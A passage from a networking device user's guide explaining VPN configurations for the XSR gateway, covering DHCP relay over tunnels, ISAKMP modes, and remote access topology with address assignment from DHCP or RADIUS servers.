User`s guide
XSR User’s Guide 245
Chapter 11 VPN Applications
Configuring the Virtual Private Network
on the corporate network. In this application the XSR must support the DHCP
Relay protocol (RFC-3046) to extend hosts' DHCP requests for IP addresses.
An obvious limitation of this configuration is that hosts cannot obtain IP
addresses before a tunnel to the corporate network is created. A secure tunnel
to the tunnel server is established by means of IETF ISAKMP Aggressive
Mode transaction with pre-shared keys or Main Mode using certificates.
Remote Access Networks
In a Remote Access application, as shown in Figure 44, a client connects to the
corporate network in the same way as a dial-in user does. First, the client
connects to an ISP and is assigned an external IP address, which is used to
route packets over the Internet.
Then, the remote client initiates a tunnel to the XSR and is assigned an
internal IP address belonging to the corporate network. An IP address given
to the connecting client can be taken from an internally managed pool created
by a DHCP or RADIUS server located on the corporate network. After
connecting, the remote client operates as if directly connected to the corporate
LAN.
Figure 44 VPN Remote Access Topology
Many protocols provide remote access functionality. Windows 95/98
supports remote access using PPTP with MPPE. Windows 2000 supports
L2TP over IPSec and proprietary solutions such as the Indus River Tunneling
Protocol IRTP (Enterasys Networks) are also available.
VPN tunnel
Internet
XSR/VPN Gateway
Routing
updates
VPN Gateway
IP address assigned
by VPN Gateway
External address
assigned by ISP
Corporate network
RADIUS server
DHCP server
Server